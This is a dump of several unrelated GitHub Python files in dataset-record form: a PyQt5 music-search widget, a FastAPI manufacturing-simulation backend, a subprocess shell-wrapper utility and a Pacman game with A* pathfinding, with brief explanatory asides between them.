large_st\n\n","repo_name":"MCG-NJU/LinK","sub_path":"detection/det3d/models/utils/ts_elk.py","file_name":"ts_elk.py","file_ext":"py","file_size_in_byte":11308,"program_lang":"python","lang":"en","doc_type":"code","stars":68,"dataset":"github-code","pt":"91"}
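# Editorial aside (not part of the module above): the spconv <-> torchsparse
# conversions hinge on torch.index_select with the index [3, 2, 1, 0], which simply
# reverses the coordinate column order, e.g. (batch, z, y, x) <-> (x, y, z, batch):
import torch

coords = torch.tensor([[0, 9, 5, 2]])  # one coordinate row, e.g. (batch, z, y, x)
reordered = torch.index_select(coords, 1, torch.LongTensor([3, 2, 1, 0]))
assert reordered.tolist() == [[2, 5, 9, 0]]  # (x, y, z, batch)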
+{"seq_id":"34211882366","text":"# coding: UTF-8\r\nfrom PyQt5.QtWidgets import *\r\nfrom PyQt5.QtGui import QFont, QIcon\r\nfrom SongsInfomation.SearchInfo import SearchInfo\r\nfrom WorkThread import WorkThread\r\nfrom PyQt5.Qt import *\r\nimport sys\r\n\r\n\r\nclass SearchWidget(QWidget):\r\n sig_search_info = pyqtSignal(str)\r\n sig_search_smart_box = pyqtSignal(str)\r\n\r\n def __init__(self, parent=None):\r\n super(SearchWidget, self).__init__(parent)\r\n\r\n # Init member\r\n self.search_lineEdit = QLineEdit()\r\n self.btn_search = QPushButton(\"搜索\")\r\n self.completer = QCompleter() # 用于实现lineEdit自动补全\r\n self.completer.setCaseSensitivity(Qt.CaseInsensitive)\r\n self.completer.setCompletionMode(QCompleter.UnfilteredPopupCompletion)\r\n self.list_model = QStringListModel()\r\n self.completer.setModel(self.list_model)\r\n\r\n # Init thread\r\n self.net_thread = QThread()\r\n self.word_thread = WorkThread()\r\n\r\n self.init_ui()\r\n self.init_connect()\r\n self.init_thread()\r\n\r\n def init_ui(self):\r\n search_layout = QHBoxLayout()\r\n hlayout = QHBoxLayout()\r\n\r\n # self.search_lineEdit.setFixedSize(700, 40)\r\n self.search_lineEdit.setMinimumWidth(400)\r\n self.search_lineEdit.setFixedHeight(40)\r\n self.search_lineEdit.setCompleter(self.completer)\r\n self.search_lineEdit.setStyleSheet(\"QLineEdit{border-radius:10px;background:rgb(255,255,255,150);}\")\r\n self.search_lineEdit.setContextMenuPolicy(Qt.NoContextMenu)\r\n self.btn_search.setCursor(Qt.PointingHandCursor)\r\n self.btn_search.setFixedSize(60, 36)\r\n\r\n self.search_lineEdit.setPlaceholderText(\"搜索歌曲\")\r\n margins = self.search_lineEdit.textMargins()\r\n self.search_lineEdit.setTextMargins(margins.left() + 15, margins.top(), self.btn_search.width() + 15, margins.bottom())\r\n\r\n \"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\r\n search_layout.addStretch()\r\n search_layout.addWidget(self.btn_search)\r\n search_layout.setSpacing(0)\r\n search_layout.setContentsMargins(0, 0, 15, 0)\r\n self.search_lineEdit.setLayout(search_layout)\r\n\r\n hlayout.addWidget(self.search_lineEdit)\r\n self.setLayout(hlayout)\r\n\r\n def init_connect(self):\r\n self.search_lineEdit.returnPressed.connect(self.btn_search.click)\r\n self.search_lineEdit.textChanged.connect(self.send_smart_box_signal)\r\n self.btn_search.clicked.connect(lambda: self.sig_search_info.emit(self.search_lineEdit.text()))\r\n\r\n def init_thread(self):\r\n self.word_thread.moveToThread(self.net_thread)\r\n\r\n # 关联子线程\r\n self.word_thread.sig_smartBoxReady.connect(self.update_completer)\r\n self.net_thread.finished.connect(self.net_thread.deleteLater)\r\n self.sig_search_smart_box.connect(self.word_thread.search_smart_box)\r\n\r\n # 启动工作线程\r\n self.net_thread.start()\r\n\r\n @pyqtSlot(str)\r\n def send_smart_box_signal(self, info):\r\n if info != \"\":\r\n self.sig_search_smart_box.emit(self.search_lineEdit.text())\r\n\r\n loop = QEventLoop()\r\n self.word_thread.sig_smartBoxReady.connect(loop.quit) # 开启事件循环,在这次结果没有获取之前不会再发信号\r\n loop.exec()\r\n\r\n @pyqtSlot(list)\r\n def update_completer(self, search_result):\r\n print(search_result)\r\n self.list_model.setStringList(search_result)\r\n\r\n\r\nif __name__ == '__main__':\r\n app = QApplication(sys.argv)\r\n demo = SearchWidget()\r\n demo.show()\r\n\r\n 
sys.exit(app.exec_())\r\n","repo_name":"yujunjiex/QQMusicDownload","sub_path":"GUI/search_widget.py","file_name":"search_widget.py","file_ext":"py","file_size_in_byte":3623,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"91"}
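# Editorial aside (not from the project above): a minimal standalone version of the
# completer pattern used in SearchWidget -- a QCompleter backed by a QStringListModel
# whose string list can be swapped at runtime, which is what update_completer() does:
import sys
from PyQt5.QtCore import QStringListModel
from PyQt5.QtWidgets import QApplication, QCompleter, QLineEdit

app = QApplication(sys.argv)
model = QStringListModel(["apple", "apricot", "banana"])
completer = QCompleter()
completer.setModel(model)
edit = QLineEdit()
edit.setCompleter(completer)
model.setStringList(["updated", "suggestions"])  # live update of the popup contents
edit.show()
sys.exit(app.exec_())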
+{"seq_id":"13907676288","text":"import configparser\nimport os\nimport sys\nimport uvicorn\nimport numpy as np\nfrom pathlib import Path\nfrom sqlalchemy import create_engine\nfrom fastapi import FastAPI, Response, status, Request\nfrom os.path import exists\n\nPACKAGE_PARENT = \"../\"\nSCRIPT_DIR = os.path.dirname(\n os.path.realpath(os.path.join(os.getcwd(), os.path.expanduser(__file__)))\n)\nsys.path.append(os.path.normpath(os.path.join(SCRIPT_DIR, PACKAGE_PARENT)))\n\ntry:\n from data.dataloader import DataLoader, DataBaseLoader\n from data.datawrangler import MachineDataLoader\n from data.datawrangler import DataWrangler\n from simulation.cartsetup import CartSetup\n from simulation.machine import Machine\n from simulation.manufacturing import Manufacturing\n from models.deploy import DeployModel\n from schemas import DummyMachine\nexcept:\n from src.data.dataloader import DataLoader, DataBaseLoader\n from src.data.datawrangler import MachineDataLoader\n from src.data.datawrangler import DataWrangler\n from src.simulation.cartsetup import CartSetup\n from src.simulation.machine import Machine\n from src.simulation.manufacturing import Manufacturing\n from src.models.deploy import DeployModel\n from src.schemas import DummyMachine\n\n\napp = FastAPI()\nconfig = configparser.ConfigParser()\nconfigPath = os.getcwd() + os.path.normpath(\"/src/settings.ini\")\nif exists(configPath):\n config.read(configPath)\nelse:\n config.add_section(\"default\")\n config.set(\"default\", \"version\", \"1.0\")\n config.add_section(\"network\")\n config.set(\"network\", \"port\", \"5000\")\n config.set(\"network\", \"host\", \"127.0.0.1\")\n config.set(\"network\", \"basepath\", \"/api/v7/\")\n\n\n@app.get(\"/\")\ndef root(response: Response, request: Request):\n \"\"\"endpoint to check base status of API\"\"\"\n response.status_code = status.HTTP_500_INTERNAL_SERVER_ERROR\n if exists(os.getcwd() + os.path.normpath(\"/data\")):\n response.status_code = status.HTTP_200_OK\n body = {\n \"API Version\": config.get(\"default\", \"version\"),\n \"Status\": response.status_code,\n \"Headers\": request.headers,\n \"Basepath\": config.get(\"network\", \"basepath\"),\n }\n return body\n\n\n@app.put(config.get(\"network\", \"basepath\") + \"/simulate/coating/\")\ndef startSimulation(productId: str, dummyMachine: DummyMachine, response: Response):\n \"\"\"endpoint to calculate the coating time for a given product\"\"\"\n # replace this with Database lookup\n if exists(os.getcwd() + \"/products.db\"):\n engine = create_engine(\"sqlite:///products.db\", echo=False)\n data = DataBaseLoader(engine, productId, \"m20\")\n else:\n path = Path(\n os.getcwd()\n + os.path.normpath(\"/data/programms/\" + productId + \"/\" + \"/m20\")\n )\n data = DataLoader(path)\n machine = Machine(dummyMachine)\n manufacturing = Manufacturing(data(), machine)\n simulationData = manufacturing.coating()\n return {\"time\": simulationData}\n\n\n@app.put(config.get(\"network\", \"basepath\") + \"/simulate/manufacturing/\")\ndef startSimulation(\n productId: str, useIdealState: bool, dummyMachine: DummyMachine, response: Response\n):\n \"\"\"endpoint to calculate the manufacturing time for a given product\"\"\"\n # replace this with Database lookup\n if exists(os.getcwd() + \"/products.db\"):\n engine = create_engine(\"sqlite:///products.db\", echo=False)\n data = DataBaseLoader(engine, productId, dummyMachine.machine)\n else:\n path = Path(\n os.getcwd()\n + os.path.normpath(\n \"/data/programms/\" + productId + \"/\" + dummyMachine.machine\n 
)\n        )\n    data = DataLoader(path)\n    machine = Machine(dummyMachine)\n    try:\n        manufacturing = Manufacturing(data(), machine)\n        simulationData = manufacturing(plotPCB=True, useIdealState=useIdealState)\n    except Exception as e:\n        response.status_code = status.HTTP_500_INTERNAL_SERVER_ERROR\n        body = {\"error\": str(e)}\n        return body\n    return simulationData\n\n\n@app.put(config.get(\"network\", \"basepath\") + \"/simulate/AI/\")\ndef startSimulation(\n    productId: str, useIdealState: bool, dummyMachine: DummyMachine, response: Response\n):\n    \"\"\"endpoint to calculate the manufacturing time for a given product\"\"\"\n    # replace this with Database lookup\n    if exists(os.getcwd() + \"/products.db\"):\n        engine = create_engine(\"sqlite:///products.db\", echo=False)\n        data = DataBaseLoader(engine, productId, dummyMachine.machine)\n    else:\n        path = Path(\n            os.getcwd()\n            + os.path.normpath(\n                \"/data/programms/\" + productId + \"/\" + dummyMachine.machine\n            )\n        )\n        data = DataLoader(path)\n    machine = Machine(dummyMachine)\n    try:\n        data = data()\n        offsets = max(data[2])\n        manufacturing = Manufacturing(data, machine)\n        plot_x, plot_y = manufacturing.getPlots()\n        model = DeployModel(\n            Path(os.getcwd() + os.path.normpath(\"/data/models/FINAL MODEL\"))\n        )\n        predArray = np.array(\n            [\n                len(data[0] * len(data[2])),\n                0 if machine.machineName == \"m10\" else 1,\n                data[0][\"X\"].max() + offsets[0],\n                data[0][\"Y\"].max() + offsets[1],\n            ]\n        )\n        predictedData = model.predict(predArray)[0][0]\n    except Exception as e:\n        response.status_code = status.HTTP_500_INTERNAL_SERVER_ERROR\n        body = {\"error\": str(e)}\n        return body\n    return {\"time\": float(predictedData), \"plot_x\": plot_x, \"plot_y\": plot_y}\n\n\n@app.get(config.get(\"network\", \"basepath\") + \"/simulate/setup/\")\ndef setupSimulation(\n    productId: str,\n    machine: str,\n    randomInterMin: int,\n    randomInterMax: int,\n    response: Response,\n):\n    \"\"\"endpoint to calculate the setup time for a given product\"\"\"\n    path = Path(\n        os.getcwd() + os.path.normpath(\"/data/programms/\" + productId + \"/\" + machine)\n    )\n    try:\n        data = DataLoader(path)\n    except:\n        return {\"time\": 420}\n\n    setupM20 = CartSetup(data(), randomInterMin, randomInterMax)\n    timeM20 = setupM20()\n    return timeM20\n\n\n@app.get(config.get(\"network\", \"basepath\") + \"/predict/order/\")\nasync def predictOrder(request: Request, response: Response):\n    \"\"\"endpoint to predict the best order of products between two given times\"\"\"\n    await request.body()\n    print(request.query_params.get(\"startdate\"))\n    print(request.query_params.get(\"enddate\"))\n\n\n@app.get(config.get(\"network\", \"basepath\") + \"/data/machinedata/\")\ndef getMachineData(response: Response):\n    \"\"\"endpoint to receive machinedata\"\"\"\n    try:\n        data = MachineDataLoader()\n    except:\n        response.status_code = status.HTTP_500_INTERNAL_SERVER_ERROR\n        return response\n\n    return data.returnData()\n\n\n@app.get(config.get(\"network\", \"basepath\") + \"/data/options/\")\ndef getOptions():\n    \"\"\"endpoint to get all available programms\"\"\"\n    # replace with DB lookup for all possible programms\n    path = Path(os.getcwd() + os.path.normpath(\"/data/programms\"))\n    if exists(os.getcwd() + \"/products.db\"):\n        engine = create_engine(\"sqlite:///products.db\", echo=False)\n        dbData = engine.execute(\"SELECT * FROM 'products'\").fetchall()\n        data = []\n        for i in dbData:\n            data.append(i[1])\n        data = {\"programms\": data}\n    else:\n        data = {\"programms\": os.listdir(path)}\n\n    return data\n\n\nif __name__ == \"__main__\":\n    uvicorn.run(\n        
\"main:app\",\n host=config.get(\"network\", \"host\"),\n port=config.getint(\"network\", \"port\"),\n log_level=\"debug\",\n reload=True,\n )\n","repo_name":"Worthy-Alpaca/dh-backend-api","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"26440725302","text":"import subprocess\nimport os\nimport tempfile\nimport collections\nimport time\nimport warnings\n\n\nclass BaseShell(object):\n class CommandExecutionError(Exception):\n def __init__(self, result, command):\n self.result = result\n self.command = \" \".join(command)\n\n def __str__(self):\n return \"Error (%s) running '%s': '%s' '%s'\" % (\n self.result.rc,\n self.command,\n self.result.stdout,\n self.result.stderr,\n )\n\n # Keeping for backwards compatibility, will be removed over time.\n @property\n def rc(self):\n warnings.warn(\"Direct use of rc in CommandExecutionError is deprecated\", DeprecationWarning)\n return self.result.rc\n\n @property\n def stdout(self):\n warnings.warn(\"Direct use of stdout in CommandExecutionError is deprecated\", DeprecationWarning)\n return self.result.stdout\n\n @property\n def stderr(self):\n warnings.warn(\"Direct use of stderr in CommandExecutionError is deprecated\", DeprecationWarning)\n return self.result.stderr\n\n # Effectively no autotimeout for commands.\n SHELLTIMEOUT = 0xFFFFFFF\n\n RunResult = collections.namedtuple(\"RunResult\", [\"rc\", \"stdout\", \"stderr\", \"timeout\"])\n\n @classmethod\n def _run(cls, arg_list, logger, monitor_func, timeout, shell=False):\n \"\"\"Separate the bare inner of running a command, so that tests can\n stub this function while retaining the related behaviour of run()\n \"\"\"\n\n assert type(arg_list) in [list, str, unicode], \"arg list must be list or str :%s\" % type(arg_list)\n\n # Allow simple commands to just be presented as a string. However do not start formatting the string this\n # will be rejected in a code review. If it has args present them as a list.\n if type(arg_list) in [str, unicode]:\n arg_list = arg_list.split()\n\n # Popen has a limit of 2^16 for the output if you use subprocess.PIPE (as we did recently) so use real files so\n # the output side is effectively limitless\n stdout_fd = tempfile.TemporaryFile()\n stderr_fd = tempfile.TemporaryFile()\n\n try:\n p = subprocess.Popen(arg_list, stdout=stdout_fd, stderr=stderr_fd, close_fds=True, shell=shell)\n\n # Rather than using p.wait(), we do a slightly more involved poll/backoff, in order\n # to poll the thread_state.teardown event as well as the completion of the subprocess.\n # This is done to allow cancellation of subprocesses\n rc = None\n max_wait = 1.0\n wait = 1.0e-3\n timeout += time.time()\n while rc is None:\n rc = p.poll()\n if rc is None:\n if monitor_func:\n monitor_func(p, arg_list, logger)\n\n time.sleep(wait)\n\n if time.time() > timeout:\n p.kill()\n stdout_fd.seek(0)\n stderr_fd.seek(0)\n return cls.RunResult(\n 254,\n stdout_fd.read().decode(\"ascii\", \"ignore\"),\n stderr_fd.read().decode(\"ascii\", \"ignore\"),\n True,\n )\n elif wait < max_wait:\n wait *= 2.0\n else:\n stdout_fd.seek(0)\n stderr_fd.seek(0)\n return cls.RunResult(\n rc,\n stdout_fd.read().decode(\"ascii\", \"ignore\"),\n stderr_fd.read().decode(\"ascii\", \"ignore\"),\n False,\n )\n finally:\n stdout_fd.close()\n stderr_fd.close()\n\n @classmethod\n def run(cls, arg_list, logger=None, monitor_func=None, timeout=SHELLTIMEOUT, shell=False):\n \"\"\"Run a subprocess, and return a tuple of rc, stdout, stderr.\n Record subprocesses run and their results in log.\n\n Note: we buffer all output, so do not run subprocesses with large outputs\n using this function.\n \"\"\"\n\n # TODO: add a 'quiet' flag and use it from spammy/polling plugins to avoid\n # sending silly amounts of command output back to the manager.\n if 
logger:\n logger.debug(\"Shell.run: %s\" % repr(arg_list))\n\n os.environ[\"TERM\"] = \"\"\n\n result = cls._run(arg_list, logger, monitor_func, timeout, shell=shell)\n\n return result\n\n @classmethod\n def try_run(cls, arg_list, logger=None, monitor_func=None, timeout=SHELLTIMEOUT, shell=False):\n \"\"\"Run a subprocess, and raise an exception if it returns nonzero. Return\n stdout string.\n \"\"\"\n\n result = cls.run(arg_list, logger, monitor_func, timeout, shell=shell)\n\n if result.rc != 0:\n raise cls.CommandExecutionError(result, arg_list)\n\n return result.stdout\n\n @classmethod\n def run_canned_error_message(cls, arg_list):\n \"\"\"\n Run a shell command return None is successful, or User Error message if not\n :param args:\n :return: None if successful or canned user error message\n \"\"\"\n result = cls.run(arg_list)\n\n if result.rc != 0:\n return \"Error (%s) running '%s': '%s' '%s'\" % (result.rc, \" \".join(arg_list), result.stdout, result.stderr)\n\n return None\n\n\n# By default Shell is this BaseShell class, and other iml_common modules use BaseShell via Shell by default.\n# However consumers (namely the agent today) may change Shell to reference their own SubClass version and this will\n# mean that iml_common consumers of Shell use the SubClass rather than the base.\nShell = BaseShell\n\n\ndef set_shell(new_shell_class):\n \"\"\"\n Change the Shell the iml_common (and any other referencers of Shell in this module) use for Shell commands\n :param new_shell_class: The new Shell classs to use\n \"\"\"\n global Shell\n Shell = new_shell_class\n","repo_name":"whamcloud/iml-common","sub_path":"iml_common/lib/shell.py","file_name":"shell.py","file_ext":"py","file_size_in_byte":6134,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
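# Editorial aside (not part of the module above): typical usage of the Shell API.
# Note the module is Python 2 era (it references `unicode`). Assumes the classes
# above are in scope:
result = Shell.run(["echo", "hello"])
print(result.rc, result.stdout)  # RunResult is a namedtuple: rc, stdout, stderr, timeout

try:
    Shell.try_run(["false"])  # a nonzero exit status raises CommandExecutionError
except Shell.CommandExecutionError as e:
    print(e)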
+{"seq_id":"17362252293","text":"import pygame, sys, copy, time, heapq\nfrom pygame.locals import *\n\n#http://www.redblobgames.com/pathfinding/a-star/implementation.html\nclass PriorityQueue:\n def __init__(self):\n self.elements = []\n \n def empty(self):\n return len(self.elements) == 0\n \n def put(self, item, priority):\n heapq.heappush(self.elements, (priority, item))\n \n def get(self):\n return heapq.heappop(self.elements)[1]\n\nclass Game():\n def __init__(self):\n pygame.init()\n \n #debug tools#\n self.drawTargetTiles = 1\n #############\n \n tileSize = 24\n self.screen = pygame.display.set_mode((1024, 724))\n self.clock = pygame.time.Clock()\n \n self.scatterTimer = 0 \n self.pelletsCollected = 0\n self.font = pygame.font.Font(None, 36)\n\n #build level\n self.level = Level()\n \n self.levelCoords = copy.deepcopy(self.level.grid)\n self.blockS = pygame.sprite.Group()\n\n self.pellet = Pellet((200, 200))\n self.pelletS = pygame.sprite.RenderPlain((self.pellet))\n \n\n self.walls = pygame.sprite.Group()\n for row in range(len(self.level.grid)):\n for column in range(len(self.level.grid[1])):\n if self.level.grid[row][column] == 1:\n block = Block(( 25 + (column*tileSize), 25 + (row*tileSize)))\n self.blockS.add(pygame.sprite.RenderPlain((block)))\n else:\n self.levelCoords[row][column] = ( 25 + (column*tileSize), 25 + (row*tileSize))\n if self.level.grid[row][column] == 0:\n pellet = Pellet(( 25 + (column*tileSize), 25 + (row*tileSize)))\n self.pelletS.add(pygame.sprite.RenderPlain((pellet)))\n\n self.gridLength = len(self.levelCoords[0]) - 1\n self.gridHeight = len(self.levelCoords) - 1\n \n self.totalPellets = len(self.pelletS)\n\n #create and spawn player\n\n spawn = self.levelCoords[21][14]\n\n self.pacman = Pacman(spawn)\n self.pacmanS = pygame.sprite.RenderPlain((self.pacman))\n\n #create ghosts\n self.blinky = Ghost(self.levelCoords[13][13], 0)\n self.inky = Ghost(self.levelCoords[14][13], 1)\n self.pinky = Ghost(self.levelCoords[13][14], 2)\n self.clyde = Ghost(self.levelCoords[14][14], 3)\n \n self.ghostS = pygame.sprite.RenderPlain((self.blinky))\n self.ghostS.add(pygame.sprite.RenderPlain((self.inky))) \n self.ghostS.add(pygame.sprite.RenderPlain((self.pinky))) \n self.ghostS.add(pygame.sprite.RenderPlain((self.clyde)))\n\n def mainLoop(self):\n running = True\n self.startTime = time.clock()\n self.pinky.canMove = 1\n \n while running:\n #INPUT\n self.clock.tick(60)\n for event in pygame.event.get():\n if event.type == pygame.QUIT: running = False\n if not hasattr(event, 'key'): continue\n if event.key == K_ESCAPE: running = False\n \n if event.key == K_RIGHT: self.pacman.kR = 2\n if event.key == K_LEFT: self.pacman.kL = 2\n if event.key == K_UP: self.pacman.kU = 2\n if event.key == K_DOWN: self.pacman.kD = 2\n\n #UPDATE\n pelletCollisions = pygame.sprite.spritecollide(self.pacman, self.pelletS, True)\n for pellet in pelletCollisions:\n self.pelletsCollected += 1\n \n self.pacman.update()\n \n self.blinky.update()\n self.inky.update()\n self.pinky.update()\n self.clyde.update()\n\n #Ghosts leaving house logic\n curTime = time.clock()\n timePassed = int(curTime - self.startTime)\n if not self.blinky.canMove:\n if timePassed >= 3: self.blinky.canMove = 1\n if not self.inky.canMove:\n if self.pelletsCollected == 30: self.inky.canMove = 1\n if not self.clyde.canMove: \n if self.pelletsCollected != 0:\n percentCollected = (self.pelletsCollected / float(self.totalPellets)) * 100\n if percentCollected >= 20: self.clyde.canMove = 1\n \n #Scatter mode\n if timePassed == 25 or 
timePassed == 60 or timePassed == 105:\n self.blinky.scatter = 1\n self.inky.scatter = 1\n self.pinky.scatter = 1\n self.clyde.scatter = 1\n\n if timePassed == 35 or timePassed == 70 or timePassed == 115:\n self.blinky.scatter = 0\n self.inky.scatter = 0\n self.pinky.scatter = 0\n self.clyde.scatter = 0\n\n #RENDER\n self.screen.fill((0, 0, 0))\n \n self.pacmanS.draw(self.screen)\n self.pelletS.draw(self.screen)\n self.blockS.draw(self.screen) \n self.ghostS.draw(self.screen)\n\n #UI\n text = self.font.render(\"Score %s\" %(self.pelletsCollected * 100), 1, (255, 255, 255))\n textpos = text.get_rect(left=self.screen.get_width() - 300)\n textpos.move_ip(0, 20)\n self.screen.blit(text, textpos)\n \n textpos.move_ip(0, 50)\n y, x = self.pacman.gridLocation\n grid = [x, y]\n text = self.font.render(\"Pacman position %s\" %str(grid).strip('[]'), 1, (255, 255, 255))\n self.screen.blit(text, textpos)\n \n textpos.move_ip(0, 50)\n y, x = self.blinky.targetTile\n grid = [x, y]\n text = self.font.render(\"Blinky target %s\" %str(grid).strip('[]'), 1, (255, 255, 255))\n self.screen.blit(text, textpos)\n if self.drawTargetTiles: pygame.draw.rect(self.screen, (255, 0, 0), (5 + (x * 24), 5 + (y * 24), 10, 10))\n\n textpos.move_ip(0, 50)\n y, x = self.pinky.targetTile\n grid = [x, y]\n text = self.font.render(\"Pinky target %s\" %str(grid).strip('[]'), 1, (255, 255, 255))\n self.screen.blit(text, textpos)\n if self.drawTargetTiles: pygame.draw.rect(self.screen, (255, 153, 255), (5 + (x * 24), 5 + (y * 24), 10, 10))\n\n textpos.move_ip(0, 50)\n y, x = self.inky.targetTile\n grid = [x, y]\n text = self.font.render(\"Inky target %s\" %str(grid).strip('[]'), 1, (255, 255, 255))\n self.screen.blit(text, textpos)\n if self.drawTargetTiles: pygame.draw.rect(self.screen, (0, 0, 255), (5 + (x * 24), 5 + (y * 24), 10, 10))\n\n textpos.move_ip(0, 50)\n y, x = self.clyde.targetTile\n grid = [x, y]\n text = self.font.render(\"Clyde target %s\" %str(grid).strip('[]'), 1, (255, 255, 255))\n self.screen.blit(text, textpos)\n if self.drawTargetTiles: pygame.draw.rect(self.screen, (255, 255, 0), (5 + (x * 24), 5 + (y * 24), 10, 10))\n\n pygame.display.flip()\n \n pygame.quit()\n\nclass Level(): #0 = pellet #1 = wall #2 = nothing\n def __init__(self):\n self.weights = {}\n self.walls = []\n self.intersections = []\n self.grid = [[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],\n [1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1],\n [1, 0, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 0, 1],\n [1, 0, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 0, 1],\n [1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1],\n [1, 0, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 0, 1],\n [1, 0, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 0, 1],\n [1, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1],\n [1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 0, 1, 1, 0, 0, 0, 0, 2, 2, 0, 0, 0, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 2, 2, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 2, 2, 2, 2, 2, 2, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 2, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0, 1, 1, 
1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 2, 2, 2, 2, 2, 2, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1],\n [1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1],\n [1, 0, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 0, 1], \n [1, 0, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 0, 1],\n [1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 2, 2, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1], \n [1, 1, 1, 0, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 0, 1, 1, 1], \n [1, 1, 1, 0, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 0, 1, 1, 1],\n [1, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1], \n [1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1],\n [1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1],\n [1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1],\n [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]]\n\n self.intersections.append((14,14))\n self.intersections.append((10,14))\n self.intersections.append((10,13))\n for row in range(len(self.grid)):\n for column in range(len(self.grid[1])):\n if self.grid[row][column] == 1:\n self.walls.append((row, column))\n count = 0\n if self.grid[row][column] == 0:\n if self.grid[row-1][column] == 0 or self.grid[row-1][column] == 2:\n count += 1\n elif self.grid[row+1][column] == 0 or self.grid[row+1][column] == 2:\n count += 1\n if self.grid[row][column-1] == 0 or self.grid[row][column-1] == 2:\n count += 1\n elif self.grid[row][column+1] == 0 or self.grid[row][column+1] == 2:\n count += 1\n\n if count >= 2:\n self.intersections.append((row, column))\n\n print(self.intersections)\n print(len(self.intersections))\n\n def heuristic(self, a, b):\n (x1, y1) = a\n (x2, y2) = b\n return abs(x1 - x2) + abs(y1 - y2)\n\n def aStarSearch(self, start, end):\n frontier = PriorityQueue()\n frontier.put(start, 0)\n cameFrom = {}\n costSoFar = {}\n cameFrom[start] = None\n costSoFar[start] = 0\n \n while not frontier.empty():\n current = frontier.get()\n\n if current == end:\n break\n \n for next in self.neighbors(current):\n x, y = next\n cost = costSoFar[current] + 1\n if next not in costSoFar or cost < costSoFar[next] and self.grid[x][y] != 1:\n costSoFar[next] = cost\n priority = cost + self.heuristic(end, next)\n frontier.put(next, priority)\n cameFrom[next] = current\n \n return cameFrom, costSoFar\n\n def reconstructPath(self, cameFrom, start, end):\n current = end\n path = [current]\n while current != start:\n current = cameFrom[current]\n path.append(current)\n path.reverse()\n return path\n\n def neighbors(self, id):\n (x, y) = id\n results = 